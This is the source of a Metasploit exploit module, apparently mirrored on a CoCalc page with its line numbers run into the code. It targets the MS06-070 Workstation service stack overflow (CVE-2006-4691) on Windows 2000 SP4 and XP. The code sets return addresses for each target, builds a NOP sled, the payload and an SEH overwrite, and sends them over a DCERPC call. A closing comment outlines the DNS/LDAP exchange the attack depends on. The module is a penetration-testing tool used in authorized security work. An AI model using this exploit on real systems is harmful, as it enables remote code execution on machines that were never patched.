CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/smb/ms06_070_wkssvc.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ManualRanking # Requires valid/working DOMAIN + DC78include Msf::Exploit::Remote::DCERPC9include Msf::Exploit::Remote::SMB::Client10include Msf::Exploit::Seh1112def initialize(info = {})13super(update_info(info,14'Name' => 'MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow',15'Description' => %q{16This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect17function using the Workstation service in Windows 2000 SP4 and Windows XP SP2.1819In order to exploit this vulnerability, you must specify the name of a20valid Windows DOMAIN. It may be possible to satisfy this condition by using21a custom DNS and LDAP setup, however that method is not covered here.2223Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator24credentials are required to reach the vulnerable code. Windows XP SP1 only25requires valid user credentials. Also, testing shows that a machine already26joined to a domain is not exploitable.27},28'Author' =>29[30'jduck'31],32'License' => MSF_LICENSE,33'References' =>34[35[ 'CVE', '2006-4691' ],36[ 'OSVDB', '30263' ],37[ 'BID', '20985' ],38[ 'MSB', 'MS06-070' ],39],40'DefaultOptions' =>41{42'EXITFUNC' => 'thread',43},44'Privileged' => true,45'Payload' =>46{47'Space' => 1024,48'BadChars' => "\x00",49'StackAdjustment' => -3500,50},51'Platform' => 'win',52'Targets' =>53[54[ 'Automatic Targetting', { } ],55[ 'Windows 2000 SP4',56{57'Offset' => (1058*2),58'Ret' => 0x75022ac4 # pop/pop/ret in ws2help.dll59}60],61[ 'Windows XP SP0/SP1',62{63'Offset' => (1290*2),64'Ret' => 0x71ab21cd # pop/pop/ret in ws2_32.dll65}66]67],68'DefaultTarget' => 0,69'DisclosureDate' => '2006-11-14'))7071register_options(72[73OptString.new('SMBPIPE', [ true, "The pipe name to use.", 'WKSSVC']),74# NOTE: a valid domain name is required. See description.75OptString.new('DOMAIN', [ true, "The domain to validate prior to joining it."])76])7778deregister_options('SMB::ProtocolVersion')79end8081def exploit8283connect(versions: [1])84smb_login()8586mytarget = nil87if (target.name =~ /Automatic/)88case smb_peer_os()89when 'Windows 5.0'90print_status("Detected a Windows 2000 target")91mytarget = targets[1]92when 'Windows 5.1'93begin94smb_create("\\SRVSVC")95print_status("Detected a Windows XP SP0/SP1 target")96rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e97if (e.error_code == 0xc0000022)98fail_with(Failure::Unknown, "Windows XP SP2 requires Administrator privileges!")99end100print_status("Detected a Windows XP target (unknown patch level)")101end102mytarget = targets[2]103else104fail_with(Failure::NoTarget, "No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...")105end106else107mytarget = target108end109110handle = dcerpc_handle(111'6bffd098-a112-3610-9833-46c3f87e345a', '1.0',112'ncacn_np', ["\\#{datastore['SMBPIPE']}"]113)114115print_status("Binding to #{handle} ...")116dcerpc_bind(handle)117print_status("Bound to #{handle} ...")118119print_status("Building the stub data...")120121distance = mytarget['Offset']122hostname = make_nops(distance - payload.encoded.length)123hostname << payload.encoded124hostname << generate_seh_record(mytarget.ret)125hostname << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string126127name = datastore['DOMAIN'] + "\\\\L"128name = Rex::Text.to_unicode(name)129name << hostname130name << Rex::Text.to_unicode(rand_text_alphanumeric(1000) * 3)131name << "\x00\x00"132133stub =134NDR.uwstring("\\\\#{datastore['RHOST']}") +135NDR.UnicodeConformantVaryingStringPreBuilt(name) +136NDR.uwstring("") +137NDR.uwstring("") +138NDR.long(0) +139NDR.long(1)140141print_status("Calling the vulnerable function...")142143begin144dcerpc.call(0x16, stub)145rescue Rex::Proto::DCERPC::Exceptions::NoResponse146rescue => e147if e.to_s !~ /STATUS_PIPE_DISCONNECTED/148raise e149end150end151152# Cleanup153handler154disconnect155end156end157158159160=begin161162The IDL for NetrJoinDomain2 looks like this:163long _NetrJoinDomain2@28 (164[in][unique][string] wchar_t * arg_1,165[in][string] wchar_t * arg_2,166[in][unique][string] wchar_t * arg_3,167[in][unique][string] wchar_t * arg_4,168[in][unique] struct_C * arg_5,169[in] long arg_6170);1711721731. --> dns server - query for IN.SRV _ldap._tcp.dc._msdcs.DOMAIN1742. <-- dns server - response including answer and additional record.175answer: whateverserver.DOMAIN priority 0 / weight 100 / port 389176additional: IN.A address of whateverserver.DOMAIN1773. --> ldap server - baseObject query with filter/attributes:178- filter: (&(&(DnsDomain=DOMAIN)(Host=TARGETHOSTNAME))(NtVer=06:00:00:00))179- attributes: AttributeDescriptionList: NetLogon1804. <-- ldap server - searchResDone success, attributes data181- PartialAttributeList netlogon - 1 item182- type 23, flags 0x1fd, domain GUID,183forest, domain, hostname, netbios domain, netbios hostname,184user, site, client site, version, lmtoken, nttoken1855. validated.186187=end188189190